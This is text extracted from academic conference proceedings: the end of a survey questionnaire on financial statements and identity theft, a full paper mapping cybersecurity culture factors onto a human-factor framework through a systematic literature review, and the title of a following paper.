Medical bill Credit card or bank statement Mortgage statement Utility bill Government document (drivers license, selective service paperwork, tax forms, etc.)
– Bank document containing updated PIN – Other confidential documents (please type) (Text-Input) – I have not received a statement or document addressed to another person
14. In your opinion, what information about your credit score should appear on your credit card statement?
– No information about your credit score – Current credit score
– Current credit score and score history
15. In your opinion, should electronic financial statements include the same information as paper statements? – Electronic statements should contain more information than paper statements – Electronic statements should contain the same information as paper statements
Securing Personally Identifiable Information (PII)
727
– Electronic statements should contain less information than paper statements 16. Have you ever provided your credit card or bank statement to another organization outside of your credit card company or bank? For example: mortgage companies, the bureau of motor vehicles, utilities companies, property rental companies, etc. – Yes
– No
17. In what form do you currently receive your financial statements? – – – –
Exclusively paper More than half paper Half paper, half electronic More than half electronic
– Exclusively electronic – I do not receive any financial statements
18. When you move to a new address, how do you inform your bank or credit card company? – I change my address through the post office – I change my address through my online banking website – I change my address through both my online banking website and the post office – I do not inform my bank or credit card company – Other (Text Input) 19. Regardless of how you inform your bank or credit card company: When you move to a new address, how far in advance do you inform your bank or credit card company? – Greater than 4 weeks – Between 1 week and 4 weeks – Between 1 day and 1 week
– Less than 1 day – Never – Other/Unknown (Text Input)
20. Select the highest level of education you’ve completed – – – –
No education High school Some college 2-Year associates or professional degree
– Bachelor’s degree – Master’s degree – Ph.D. or higher – Prefer not to answer
21. Select your gender – Male – Female
– Non-binary – Other (Text Input)
– Prefer not to say
728
G. Hamilton et al.
22. Select your ethnicity – – – – – –
Caucasian Black/African-American Latino or Hispanic Asian Middle Eastern Native American
– Native Hawaiian or Pacific Islander – Two or more of the options above – Other/Unknown (Text Input) – Prefer not to answer
23. Select your age range – 18–25 – 26–30 – 31–35
– 36–40 – 41–45 – 46–55
– 55–64
– Prefer not to answer
– 65+
References 1. Albrecht, C., Albrecht, C., Tzafrir, S.: How to protect and minimize consumer risk to identity theft. J. Finan. Crime 18(4), 405–414 (2011) 2. Arnold, M.: Standard chartered says it has acted after bank statements theft. FT.com (2014) 3. FDIC: Insured or not insured? (2020). https://www.fdic.gov/consumers/ consumer/information/fdiciorn.html 4. FTC. Financial institutions and customer information: Complying with the safeguards rule, July 2020. https://www.ftc.gov/tips-advice/business-center/ guidance/financial-institutions-customer-information-complying 5. Galloway, A.: Non-probability sampling. In: Kempf-Leonard, K. (ed.) Encyclopedia of Social Measurement, pp. 859–864. Elsevier, New York (2005) 6. Jibril, A.B., Kwarteng, M.A., Botchway, R.K., Bode, J., Chovancova, M.: The impact of online identity theft on customers’ willingness to engage in e-banking transaction in Ghana: a technology threat avoidance theory. Cogent Bus. Manag. 7(1), 1832825 (2020) 7. Kahn, C.M., Li˜ nares-Zegarra, J.M.: Identity theft and consumer payment choice: does security really matter? J. Financ. Serv. Res. 50(1), 121–159 (2016) 8. McLaughlin, R., Currie, E.: Is your bank putting you at risk of identity theft? (2020). https://bc.ctvnews.ca/is-your-bank-putting-you-at-risk-of-identity-theft1.5130626 9. Rohmeyer, P., Bayuk, J.L.: Financial Cybersecurity Risk Management: Leadership Perspectives and Guidance for Systems and Institutions. Apress (2018) 10. Strohm, M.: Digital banking survey: how Americans prefer to bank (2022). https:// www.forbes.com/advisor/banking/digital-banking-survey-2022/ 11. Salmon, F.: Someone can empty your bank account with the information on the front of every check you write (2016). https://splinternews.com/someone-canempty-your-bank-account-with-the-informatio-1793857226 12. Schaprio, R.: Is mail theft surging in the U.S.? postal service inspectors don’t know (2020). https://www.nbcnews.com/news/us-news/mail-theft-surgingu-s-postal-service-inspectors-don-t-n1241179 13. Finextra. Nab sends customer account details to the wrong people (2007). https:// www.finextra.com/news/fullstory.aspx?newsitemid=16564
Conceptual Mapping of the Cybersecurity Culture to Human Factor Domain Framework Emilia N. Mwim1 , Jabu Mtsweni2(B) , and Bester Chimbo1(B) 1 Department of Information Systems, School of Computing, College of Science Engineering
and Technology, Unisa, Florida, South Africa {mwimen,chimbb}@unisa.ac.za 2 Head of Information and Cyber Security Centre, CSIR, Pretoria, South Africa [email protected]
Abstract. Human related vulnerability challenges continue to increase as organisations intensify their use of interconnected technologies for operations particularly due to the emergence of COVID-19 pandemic. Notwithstanding the challenge of a human problem on cybersecurity, existing cybersecurity measures predominately focused on technological solutions which on their own have proven to be insufficient. To ensure all-inclusive cybersecurity solution, efforts are shifting to accommodate human angle which complements technological efforts towards eradicating cybersecurity challenges hence the move to cybersecurity culture (CSC). The importance of the human-related factor on the security of information and IT system has been emphasised by various research leading to the development of Human Factor Diamond (HFD) framework. This paper at the conceptual level mapped the articulated list of identified CSC factors to the HFD framework to determine the CSC factors that are associated with the different domains of human factor framework. The mapping depicts that each domain of human factor framework has CSC factors associated to it. Management appeared as the domain with the predominate number of factors, followed by responsibility, environment and preparedness respectively. Keywords: Human factor · Cybersecurity culture · Human factor domain · Cybersecurity culture factors
1 Introduction Cybersecurity is a global issue of concern among nations, industries and sectors [1, 2]. The term has been widely defined as an approach used to tackle cyber threats and risks [3, 4] to protect the Confidentiality, Integrity and Availability (CIA) of cyber assets [5]. Depending on the industry, cybersecurity is confronted with different challenges ranging from lack of resources, outdated technology, to lack of awareness, education and training [6–8]. However, error as a result of human related factor has been emphasised to constitute the major cause of cybersecurity incidents and challenges across sectors but with some sectors mostly affected [9–11]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 729–742, 2023. https://doi.org/10.1007/978-3-031-28073-3_49
730
E. N. Mwim et al.
Despite human error being considered one of the biggest contributors of cybersecurity threats and the major vulnerability of IT systems, the problem is still not receiving significant attention [12, 13]. Efforts towards human related measure to make human realise the significance of obeying rules and behaving in line with organisation’s acceptable security behaviour still need attention [13]. Cybersecurity efforts focus predominately on using technological solutions like firewall, anti-virus, endpoint security and intrusion detection systems to protect organisations from cyber threats [14–16]. Nonetheless, the continuous increase in the global cybersecurity incidents and the changing landscape of cyber threats particularly in the healthcare and financial sectors are real evidences that technological solutions alone have proven insufficient in addressing the problem of cyber threats in today’s organisations. A more recent research still hold the same view that existing perspective on cybersecurity is narrow as it overlooks human elements but rather focuses attention on technological solutions [17]. Hence, security measures require some elements of human participation as it will be impossible for organisations to protect the CIA of their information and cyber resource without the human factor. The inadequate solution to the cybersecurity issues due to lack of an inclusive cybersecurity solution positions CSC as a critical research area. It is for this reason that the importance of CSC as a fundamental consideration towards eradication of human problem in cybersecurity is beginning to gain attention [18–22]. CSC is an evolving research area with a growing need for research. This has led to the development of articulated list of CSC factors [23]. In this paper, the identified CSC factors are conceptually mapped to the Alhogail et al. HFD framework to determine the CSC factors that can be attributed to different domains of human factor. Through this mapping, domains of human factor framework could be recommended as possible dimensions to be considered in future CSC research. The major advantage of the conceptual model developed in this paper is that it accommodates a broader list of CSC factors. The paper presents the Preferred Reporting Items for Systematic Reviews and MetaAnalyses (PRISMA) method followed in identifying the consolidated CSC factors. The actual factors identified are highlighted in Sect. 3, following this is a presentation of the human factor framework in Sect. 4. Building on the studies on CSC framework and human factor domain, a conceptual mapping of the CSC factor to the Alhogail et al. HFD framework is presented in Sect. 5. Finally, in Sect. 6 the limitations of the paper is outlined and the conclusion and future work are presented in Sect. 7.
2 Research Method The systematic literature review used for developing the articulated list of CSC factors followed the PRISMA technique [24]. PRISMA approach to systematic review uses carefully designed method to identify and review related literature and analyse the findings from the literature. The review followed four-phases approach summarised in the PRISMA diagram depicted in Fig. 1. • Publications in academic and non-academic databases in computing and noncomputing database were searched and retrieved.
Conceptual Mapping of the Cybersecurity Culture
731
• Title and abstracts were reviewed, and duplicate articles were removed. • After the removal of duplicate articles, the remaining records are saved and imported into ATLAS.ti for final review. • In the final review, further articles were removed because they did not meet the inclusion criteria. Few more articles were added from the references of the reviewed articles. The literature search took place between December 2020 and March 2021 using the key words below to search for peer-reviewed academic publications and other few non-academic publications. “cybersecurity culture” OR “cyber security culture” “cybersecurity culture*” OR “cyber security culture*” Included in the review are: 1) articles published between 2010 and 2021 2) publications that are only in English 3) articles published in journal, conference proceedings, theses, book chapters, policy documents and reports 4) work on cybersecurity culture conducted at all levels (which are: individual, organisational, national, and international). Articles excluded in the review include those that fall outside the specified year range, not published in English, and those its contents are not largely focused on cybersecurity culture. Table 1 provides a summary of the searched databases with the number of retrieved records. Table 1. Database search Literature search IEEE ACM
Numbers 94 7
Web of Science
40
ProQuest
87
PubMed
120
Sabinet
6
Scopus
165
Others
17
Alert
3
Using the search keyword, a total of 539 articles were retrieved. 39 articles were identified as duplicates and removed. After reviewing the title and abstract of the identified articles, additional 423 records were removed due to the irrelevance of the articles. A total of 77 articles were retained for full-text review. After applying the inclusion and exclusion criteria, a further 19 articles were removed because their focus was not predominately on CSC and its factors. Figure 1 depicts the PRISMA process.
732
E. N. Mwim et al.
Fig. 1. PRISMA process
3 Identified Cybersecurity Culture Factors The journey to develop the articulated list of CSC factors was motivated by the growing need for research on CSC as an emerging area. Work on the area of CSC is still at the infant stage but is beginning to gain momentum as it is emerging as a measure that can help eradicate human related problems in cybersecurity. Overtime the concept of cybersecurity has predominately been used interchangeably with information security and the same applied to the corresponding concepts of CSC and information security culture [25, 26]. With this view, cybersecurity is defined directly as information security [27]. However, it has emerged that a critical difference exists between the two research concepts [18, 28–30]. A major difference between the terms is visible in the National Institute of Standards and Technology (NIST) definitions of the terms. The focus of information security is on the protection information assets irrespective of its format
Conceptual Mapping of the Cybersecurity Culture
733
while cybersecurity focuses on the protection of digital assets. Another critical distinction between them is based on the fact that information security focuses on the protection of information within the organizational context while cybersecurity extends to the outside borders of the organization since cyberspace allows the sharing of information outside the borders of the organization [28, 30]. Putting this into consideration, it became essential to identify and understand the factors that are attributed to CSC since the information security culture has been researched extensively. Based on the identified factors, the top factors that are highly significant in the cultivation, implementation and maintenance of CSC are: training and education; awareness; top management or leadership support; human behaviour; organisational culture; cybersecurity policy and procedures; cybersecurity strategy; budget and resources; knowledge; role and responsibility; cybersecurity champion or team; engagement, encouragement, cooperation; commitment; and collaboration. The complete factors identified are contained in Table 2 below. Table 2 depicts the 29 identified CSC factors in the first leg of the CSC series of publications. For detail explanations of these factor, see [23]. Table 2. Cybersecurity culture factors Cybersecurity culture factors Training and education
Awareness
Top management
Cybersecurity policy and procedures
Role and responsibility
Engagement, encouragement, cooperation
Human behaviour
Budget and resources
Cybersecurity strategy
Knowledge and understanding
Collaboration
Information sharing
Commitment
Organisational culture
Cybersecurity champion or team
Change management
Cybersecurity hub
Accountability
Collectivism
Trust
Compliance
Security audit
Rewards and sanctions
Measure of effectiveness
Edictal conduct
National culture
Governance and control (legal and regulatory)
Having highlighted the CSC factors identified in research, the next section provides background on human factor which is considered the greatest threats to cybersecurity.
4 Human Factor Humans are the insiders, employees or individuals who access and use the ICT resources of an organisation to achieve a specific purpose [11, 31, 32]. Technological innovation and opportunity created by the emergence of 4IR have diversified organisation’s users
734
E. N. Mwim et al.
and employees to include those with physical location in the organisation and those that are virtually located which in turn have diversified the nature of threat that can be posed by the behaviours of these users. Threat posed by users or employees is referred to as insider threat and years of research has revealed human related factors to constitute the greatest cause of security threats and incidents that confront organisations [9–11, 31, 33–35]. Attributed to this is because this group is believed to be trusted members of organisation with valid access to systems and endpoint securities [16, 35]. Threats based on human behaviour can be as a result of malicious and non-malicious actions of employees. Malicious actions include unethical and illegal behaviours data destruction, persistent attack and identity theft [16, 36] and non-malicious employee behaviours include not turning off workstation when not in use, not following password procedure and careless attitude of employees [16]. Despite human related problem contributing to the greatest cybersecurity threats and challenges, research in the area where human is considered to be at the center of cybersecurity solution (commonly known as cybersecurity culture) has not yet received significant attention [12, 13] as to compare with information security hence the move to CSC. Past effort to address the cybersecurity problem predominately focused on technological solutions [14–16]. Moreover, the global cybersecurity incidents and changing landscape of cyber threats are evidence that technological solutions on their own are unable to sufficiently address cybersecurity threats and challenges in today’s organisations due to the human related factors. Human behaviour is likely to expose organisations to cybersecurity threat regardless of the available technical solutions and their effectiveness. Therefore, efforts towards human related measure needs an urgent attention [13]. 4.1 Factors of Human Problem Various factors contribute to the human related problem across various levels of cybersecurity, be it at individual, organisational, national and at international level. For example, it could be easy to persuade, deceive and hoax humans to compromise access to serious organisation information or to click on malicious links that could have devastating effect. Lack of user’s participation, avoiding important security activities, nurturing the view that security measures are hindrances and waste of time, finding it difficult to accept changes introduced in the organistion, absence of motivation, lack of awareness and poor use of technology are also identified as factors that contribute to human related problem. The additional human related factors that positively or negatively influence the employees’ behaviour towards cybersecurity include their perception, norms, attitude, values, believes and other characteristics that are unique to them [37–39]. Linked to the human factors are knowledge, skills, commitment, training and awareness on security related issues that relate to employees [40]. The factors complement each other and holistically determine the level of employee’s preparedness to keep the organisation’s security requirements [41]. Absence of these factors could influence employee’s behaviour negatively and hinder them from securing the CIA of organization’s sensitive information and other vital information within and outside the organisation. It is argued that users with the necessary security education and awareness, monitored security behaviour and compliance measures may still not guarantee a secured behaviour [42], especially where
Conceptual Mapping of the Cybersecurity Culture
735
they have developed negative attitude and perception towards security [39, 43]. Even without security education and awareness, such users may still likely display behaviours that are not unique to them [42]. Emerging out strongly from the factors that contributed to human-related factors are human characteristics and behaviours that deal with qualities of culture which Schein described as an abstraction that are tangible in behaviours and attitudes of people. The observations of problem relating to human factor call for research on human approach and CSC [14]. Research has shown that cultivating a security culture among users remains the most appropriate approach in addressing the human-related problem [44, 45]. Since the discovery of culture as a measure in eliminating human vulnerabilities, past research has focused extensively on information security culture [1, 12, 31, 33, 37, 46]. However, given the invention of interconnected technologies and the impact of 4IR in broadening the connectivity of employees and users which exposes them to more security threats, information security culture that focuses on organisational context will fall short in addressing cybersecurity threats and challenges. This results in cultivating CSC as a form of security culture that extends beyond the organisation context. The need to develop and preserve an appropriate, a workable and an easy to follow cybersecurity culture in an organisation is welcomed as the means to protect employees from unintentional harm and attacks [47]. CSC is considered as a humancentred approach to security of information as well as other assets on the cyberspace [48]. Research efforts on the area of human factor mostly focus on information security and information security culture. On the contrary, CSC has not received the necessary attention hence the concept and its delineating elements are still ill defined [18, 48]. Consistent with other emerging research in building the domain of CSC, the researchers in this paper map the identified lists of CSC factors presented in Sect. 3 to domains of Alhogail et al. human factor framework. 4.2 Human Factor Framework The importance of human factor in ensuring the security of organisation and its critical assets have been dealt with significantly in information security [36, 37, 39, 43, 49–52]. Research in this area have investigated for example the impact of personality traits [15, 34, 47, 53, 54] and the effect of cultural setting [55, 56]. The various research led to the development of a framework that provides a detailed view of human factor problems that influence human behaviour towards security [11]. Figure 2 depicts the human factor framework. The framework aimed to make the understanding of human factor easier by evaluating them from four domain angles [11]. According to the framework, human factors are categorized into two dimensions namely organisation and employee. Organisation dimension consists of environment domain which relates to issue of culture, social norms, standards and regulations; and management domain deals with the issue of security policy, practices, management commitment and direction. Employee dimension deals with preparedness domain which focuses on issues such as training, awareness, and knowledge acquisition, training; and responsibility domain which deals with employee
736
E. N. Mwim et al.
Fig. 2. Human factor diamond framework [11]
commitment, skills, practices and performance such as employee acceptance of responsibility, monitoring, control, rewards and deterrence [11, 31]. Responsibility domain relates to employee attitudes.
5 Mapping of Cybersecurity Culture Factors and Human Factor Domain A comprehensive list of CSC factors identified during the systematic literature review was highlighted in Sect. 3 and in Sect. 4 Alhogail et al. human factor framework was presented. Since it emerged that CSC revolves around human and that the HRD frameworks enhance the understanding of human factor, it is deemed critical to plot the CSC factors in relation to HFD framework. This will contribute to research as it combines the various factors of CSC consolidated in [23] to provide a detail picture of CSC that covers human factor issues. Additionally, the mapping provides a knowledge relating to how the underlining CSC factors are categories under the elements and associating issues of HFD framework. To map the CSC factors the researchers examined the: internal and external factors that influence security culture, organisational and individual factors according to the existing CSC frameworks and model as well as the explanations of the human factor domain depicted in Fig. 2. Internal factors are factors inside the organisation that can be seen at organisational and individual levels, for example the provision of cybersecurity resource is a factor at the organisational level and human characteristic is an individual level factor [29, 57]. External factors are outside factors that influences the security culture of organisation for example national culture, standards and legal requirement [29, 57]. Based on the explanations provided on the human factor domain by Alhogail et al. and the indication of different groups of factors highlighted in this section, the paper maps the CSC factors against the four domains as depicted in Fig. 3.
Conceptual Mapping of the Cybersecurity Culture
737
Fig. 3. Mapping of CSC factor to HFD framework
According to Fig. 3, the CSC factors are grouped into two dimensions of organisation and individual levels using the [11] four domains of human factors which are environment, management, preparedness and responsibility. 5.1 Organisational and Individual Levels Factors Organizational level factors include factors linked to the technological infrastructure, operation, policy, and procedure of organization security [58]. Organisational factors are management actions that are used to influence and shape CSC [20, 29]. According to [29], organisational factor referred to as organisation mechanisms are spoken rules of the organization that are shaped by leadership actions. The organization mechanisms include factors like rewards and punishments, CSC leadership, and communication. These factors are an example of internal organization factors and they are depicted at the management domain of the conceptual model in Fig. 3. As shown in Fig. 3, it is evident therefore that organisational level includes factors that are internal to the organisation (management related factors) and it is also influenced by external factors (environmental related factors). An example of external factors is government rule on cyberssecurity that influences the development of organisation policy and procedures on cybersecurity.
738
E. N. Mwim et al.
Individual level factors are factors that focuses on employee’s traits and characteristics and have immediate influence on their security behaviours [58]. According to the human factor framework by Alhogail et al., individual factors which are also referred to as employee factors [11], are categorised into preparedness and responsibility. Preparedness are actions that prepares employees for cybersecurity for example training and awareness which they take initiatives to acquire. Responsibility relates to employee’s behavior which demonstrates their roles and duties in the organization. Examples of responsibility include employee commitment and attitude towards cybersecurity. 5.2 Discussions In addition to the Alhogail et al. explanation of the human factor framework, another important literature that contributed significantly to the mapping of the factors to the framework is the CSC model according to [58]. Although there are already theoretical perspectives that deals with human aspects such as those of [29, 58], However, there are a few drawbacks on the frameworks which include: lack of consistency on the way the authors’ frameworks categorised and consolidated the various human aspects; and the frameworks were not based on all-inclusive factors of CSC. In order to eradicate these challenges, Fig. 3 which is the conceptual model developed in this paper used HFD framework to bring consistency across the existing CSC frameworks that focused on human factors aspects. The model is based on the consolidated CSC factors recently developed from a systematic literature review study [23]. Based on the mapping of the factors depicted in Fig. 3 it is evident that the achievement of CSC requires favorable human behavioural actions from both the organisational and individual levels. Hence, there are factors associated with domains that represent each level. Management from the organisational level is an important domain that contains the greatest number of CSC factors with a total number of 19 CSC factors. This is followed by responsibility domain from individual level with the second highest number of factors with a total of seven CSC factors. Finally, environment from organisational level and preparedness from the individual level are domains with the least number of factors totaling four and three factors respectively. It is also important to note that the two HFD, management and responsibility with the highest number of factors assigned to them also have few CSC factors that are applicable to them, which include commitment and compliance. These factors are applicable to the two domains because actions are required both at the organisational and individual levels to achieve the factor. Based on the explanation of organisatsionl factor and the grouping of its factors [11, 20, 58], organisational culture factor is considered to be a factor in both management and environment domain. Compliance and commitment are considered as factors in both organization and individual levels dimension under the domains of management and responsibility. On the one-hand, organisations encourage compliance and they are also committed to ensure adherence to security policy and procedure among employees in the organization. On the other hand, employees need to ensure compliance to security policy and standard as well as being committed to security issues.
Conceptual Mapping of the Cybersecurity Culture
739
This conceptual assigning of the CSC factors to the HFD framework appears consistent with Alhogail et al. original findings. According to the finding in the author’s original work, it revealed that management is the domain with the highest score followed by preparedness. Just like in Alhogail et al. findings, in this paper, environment and preparedness domains contain mostly the same number of factors with the difference of one factor between them. The actual impacts of these factors on each of the domains would be ascertained with the empirical findings which is the next stage of the research.
6 Limitation The major limitation of this paper is the fact that the CSC factors have not been evaluated and validated with empirical data against the domains of the HFD.
7 Conclusion and Future Work With the emergence and increasing use of interconnected technology, the goal of every organisation is to protect its crucial assets from cyber-attack incidents. As a result, organisations are implementing technological security to eradicate cyber-attack. However, the ever-increasing cybersecurity incidents across organisations is evidence that the advance technological measure on its own cannot provide a full protection to organisation if human factor elements of the organisation are not considered. The study developed a conceptual understanding of the CSC factors that are associated with each domain of HFD framework of Alhogail et al. To do this, the researchers mapped the CSC factors identified in their previous study to the existing and well-established framework of human factor. It is evident from the mapping that the four domains namely environment, management, preparedness and responsibility representing organisational and individual levels have factors that are associated with them. Management from organisational level has the highest number of factors associated with it, followed by responsibility from individual level. This paper recommends at conceptual level that the human domain elements on which the CSC factors are mapped could be considered as possible dimensions in future CSC discussions and research. As a future work, the researchers are currently busy with the evaluation and validation.
References 1. Hassan, N., Maarop, N., Ismail, Z., Abidin, W.: Information security culture in health informatics environment: a qualitative approach. In: 2017 International Conference on Research and Innovation in Information Systems (ICRIIS), pp. 1–6 (2017) 2. Kortjan, N., von Solms, R.: A conceptual framework for cyber-security awareness and education in SA. South African Comput. J. 52(52), 29–41 (2014) 3. Luiijf, E., Besseling, K.: Nineteen national cyber security strategies. Int. J. Crit. Infrastruct. 9(1–2), 3–31 (2013) 4. Schatz, D., Bashroush, R., Wall, J.: Towards a more representative definition cyber security. J. Dig. Foren. Secur. Law 12(2), 8 (2017)
740
E. N. Mwim et al.
5. Pfleeger, C., Pfleeger, L., Margulies, J.: Security in Computing, 5th edn. Pearson Education (2015) 6. Coventry, L., Branley, D.: Cybersecurity in healthcare: a narrative review of trends, threats and ways forward. Maturitas 113, 48–52 (2018) 7. Martin, G., Martin, P., Hankin, C., Darzi, A., Kinross, J.: Cybersecurity and healthcare: how safe are we? BMJ 358, 4–7 (2017) 8. Ghafur, S., Grass, E., Jennings, N., Darzi, A.: The challenges of cybersecurity in health care: the UK National Health Service as a case study. Lancet Dig. Health 1(1), 10–12 (2019) 9. Ponemon Institute: 2017 Cost of Data Breach Study: Global Overview (2018). https://www.ponemon.org/blog/2017-cost-of-data-breach-study-united-states%0A, https:// www.ibm.com/security/data-breach. Accessed 20 Jan 2020 10. Furnell, S., Alotaibi, F., Esmael, R.: Aligning security practice with policy: guiding and nudging towards better behavior. In: Proceedings of the 52nd Hawaii International Conference on System Sciences, pp. 5618–5627 (2019) 11. Alhogail, A., Mirza, A., Bakry, S.: A comprehensive human factor framework for information security in organizations. J. Theor. Appl. Inform. Technol. 78(2), 201–211 (2015) 12. Thomson, K., von Solms, R., Louw, L.: Cultivating an organizational information security culture. Comput. Fraud Secur. 10, 7–11 (2006) 13. Ciuperca, E., Vevera, V., Cirnu, C.: Social variables of cyber security educational programmes. In: The 15th International Scientific Conference eLearning and Software for Education Bucharest, pp. 190–194 (2019) 14. Gcaza, N., von Solms, R., Van Vuuren, J.: An ontology for a national cyber-security culture environment. In: Proceedings of the 9th International Symposium on Human Aspects of Information Security and Assurance, HAISA 2015, Haisa, pp. 1–10 (2015) 15. Jeong, J., Mihelcic, J., Oliver, G., Rudolph, C.: Towards an improved understanding of human factors in cybersecurity. In: Proceedings - 2019 IEEE 5th International Conference on Collaboration and Internet Computing, CIC 2019, pp. 338–345 (2019) 16. Warkentin, M., Willison, R.: Behavioral and policy issues in information systems security: the insider threat. Eur. J. Inform. Syst. 18(2), 101–105 (2009) 17. Branley-bell, D., Coventry, L., Sillence, E.: Promoting cybersecurity culture change in healthcare. In: The 14th Pervasive Technologies Related to Assistive Environments Conference, pp. 544–549 (2021) 18. Gcaza, N., von Solms, R.: Cybersecurity culture: an ill-defined problem. In: 10th IFIP World Conference on Information Security Education (WISE), pp. 98–109 (2017) 19. Corradini, I.: Building a cybersecurity culture. In: Building a Cybersecurity Culture in Organizations. SSDC, vol. 284, pp. 63–86. Springer, Cham (2020). https://doi.org/10.1007/9783-030-43999-6_4 20. European Union Agency for Network and Information Security, Cyber Security Culture in organisations (2017) 21. Gundu, T., Maronga, M., Boucher, D.: Industry 4.0 business perspective: fostering a cyber security culture in a culturally diverse workplace. In: Proceedings of 4th International Conference on the Internet, Cyber Security and Information Systems, pp. 85–94 (2019) 22. Gcaza, N.: A national Strategy towards Cultivating a Cybersecurity Culture in South Africa. Nelson Mandela Metropolitan University (2017) 23. Mwim, E.N., Mtsweni, J.: Systematic review of factors that influence the cybersecurity culture. In: Clarke, N., Furnell, S. (eds) Human Aspects of Information Security and Assurance. HAISA 2022. IFIP Advances in Information and Communication Technology, vol. 658, pp. 147–172. Springer, Cham (2022). https://doi.org/10.1007/978-3-031-12172-2_12 24. Moher, D., Liberati, A., Tetzlaff, J., Altman, D.G., Group, P.: Preferred reporting items for systematic reviews and meta-analyses: the PRISMA statement. Ann. Internal Med. 151(4), 264–270 (2009)
Conceptual Mapping of the Cybersecurity Culture
741
25. Astakhova, L.V.: The concept of the information-security culture. Sci. Tech. Inf. Process. 41(1), 22–28 (2014). https://doi.org/10.3103/S0147688214010067 26. Ghernaouti-Hélie, S.: An inclusive information society needs a global approach of information security. In: Proceedings of International Conference on Availability, Reliability Security, pp. 658–662 (2009) 27. ISO/IEC 27002: Information technology-Security techniques-Code of practice for information security management (2005). www.iso.org. Accessed 14 Aug 2020 28. Reid, R., Van Niekerk, J.: From information security to cyber security cultures. In: 2014 Information Security for South Africa - Proceedings of the ISSA 2014 Conference, pp. 1–7 (2014) 29. Huang, K., Pearlson, K.: For what technology can’ t fix: building a model of organizational cybersecurity culture. In: Proceeding of the 52nd Hawaii International Conference on System Sciences, pp. 6398–6407 (2019) 30. von Solms, R., van Niekerk, J.: From information security to cyber security. Comput. Secur. 38, 97–102 (2013) 31. Alhogail, A., Mirza, A., Bakry, S.H.: A comprehensive human factor framework for information security in organizations. J. Theor. Appl. Inf. Technol. 78(2), 201–211 (2015) 32. Alshboul, Y., Streff, K.: Beyond cybersecurity awareness: antecedents and satisfaction. In: Proceeding of the 2017 International Conference Proceeding Software and e-Business, pp. 85– 91 (2017) 33. Da Veiga, A., Martins, N.: Improving the information security culture through monitoring and implementation actions illustrated through a case study. Comput. Secur. 49, 162–176 (2015) 34. Evans, M., Maglaras, L., He, Y., Janicke, H.: Human behaviour as an aspect of cybersecurity assurance. Secur. Commun. Netw. 9(17), 4667–4679 (2016) 35. Holdsworth, J., Apeh, E.: An effective immersive cyber security awareness learning platform for businesses in the hospitality sector. In: Proceedings of 2017 IEEE 25th International Requirements Engineering Conference Workshops, REW 2017, pp. 111–117 (2017) 36. Stanton, J., Stam, K., Mastrangelo, P., Jolton, J.: Analysis of end user security behaviors. Comput. Secur. 24(2), 124–133 (2005) 37. Da Veiga, A., Eloff, J.: A framework and assessment instrument for information security culture. Comput. Secur. 29(2), 196–207 (2010) 38. Gcaza, N., Von Solms, R.: A strategy for a cybersecurity culture: a South African perspective. Electron. J. Inform. Syst. Develop. Countries 80(1), 1–17 (2017) 39. Leach, L.: Improving user security behaviour. Comput. Secur, 22(8), 685–692 (2003) 40. Pfleeger, S.L., Caputo, D.D.: Leveraging behavioral science to mitigate cyber security risk. Comput. Secur. 31(4), 597–611 (2012) 41. Goh, R.: Information Security: The Importance of the Human Element. Preston University (2003) 42. Al-Shehri, Y.: Information security awareness and culture. Br. J. Arts Soc. Sci. 6(1), 2046– 9578 (2012). Accessed 22 Oct 2018 43. Van Niekerk, J.: Fostering Information Security Culture Through Integrating Theory and Technology, Nelson Mandela Metropolitan University (2010) 44. Furnell, S., Thomson, K.: From culture to disobedience: recognising the varying user acceptance of IT security. Computi. Fraud Secur 2009(2), 5–10 (2009) 45. Reid, R., Van Niekerk, J.: Towards an education campaign for fostering a societal, cyber security culture. In: 8th International Symposium Human Aspect of Information Security Assurance (HAISA), pp. 174–184 (2014) 46. Schlienger, T., Teufel, S.: Information security culture. In: Ghonaimy, M.A., El-Hadidi, M.T., Aslan, H.K. (eds.) Security in the Information Society. IAICT, vol. 86, pp. 191–201. Springer, Boston, MA (2002). https://doi.org/10.1007/978-0-387-35586-3_15
742
E. N. Mwim et al.
47. Metalidou, E., Marinagi, C., Trivellas, P., Eberhagen, N., Skourlas, C., Giannakopoulos, G.: The human factor of information security: unintentional damage perspective”. Procedia - Soc. Behav. Sci. 147, 424–428 (2014) 48. Gcaza, N., Von Solms, R., Grobler, M., Van Vuuren, J.: A general morphological analysis: delineating a cyber-security culture. Inform. Comput. Secur. 25(3), 259–278 (2017) 49. Alnatheer, M., Nelson, K.: Proposed framework for understanding information security culture and practices in the Saudi context. In: Proceedings of the 7th Australian Information Security Management Conference, pp. 6–17 (2009) 50. Colwill, C.: Human factors in information security: the insider threat–who can you trust these days? Inform. Secur. Technol. Report 14(4), 186–196 (2009) 51. Knapp, K., Marshall, T., Rainer, K., Ford, F.: Information security: management’s effect on culture and policy. Inform. Manage. Comput. Secur. 14(1), 24–36 (2006) 52. Oates, B., Capper, G.: Using systematic reviews and evidence-based software engineering with masters students. In: 13th International Conference on Evaluation and Assessment in Software Engineering, pp. 1–9 (2009) 53. Farooq, A., Isoaho, J., Virtanen, S., Isoaho, J.: Information security awareness in educational institution: an analysis of students’ individual factors. In: Proceedings - 14th IEEE International Conference on Trust, Security and Privacy in Computing and Communications, TrustCom 2015, pp. 352–359 (2005) 54. McCormac, A., Zwaans, T., Parsons, K., Calic, D., Butavicius, M., Pattinson, M.: Individual differences and Information Security Awareness. Comput. Hum. Behav. 69, 151–156 (2017) 55. Halevi, T., et al.: Cultural and psychological factors in cyber-security. In: Proceedings of the 18th International Conference on Information Integration and Web-based Applications and Services, pp. 318–324 (2016) 56. Sun, J., Ahluwalia, P., Koong, K.: The more secure the better? A study of information security readiness. Indust. Manage. Data Syst. 111(4), 570–588 (2011) 57. Da Veiga, D.: Achieving a Security Culture, in Chapter 5 In Cybersecurity Education for Awareness and Compliance (2018) 58. Georgiadou, A., Mouzakitis, S., Bounas, K., Askounis, D.: A cyber-security culture framework for assessing organization readiness. J. Comput. Inform. Syst. 1–11 (2020)
Attacking Compressed Vision Transformers Swapnil Parekh(B) , Pratyush Shukla, and Devansh Shah New York University, New York City, USA [email protected]
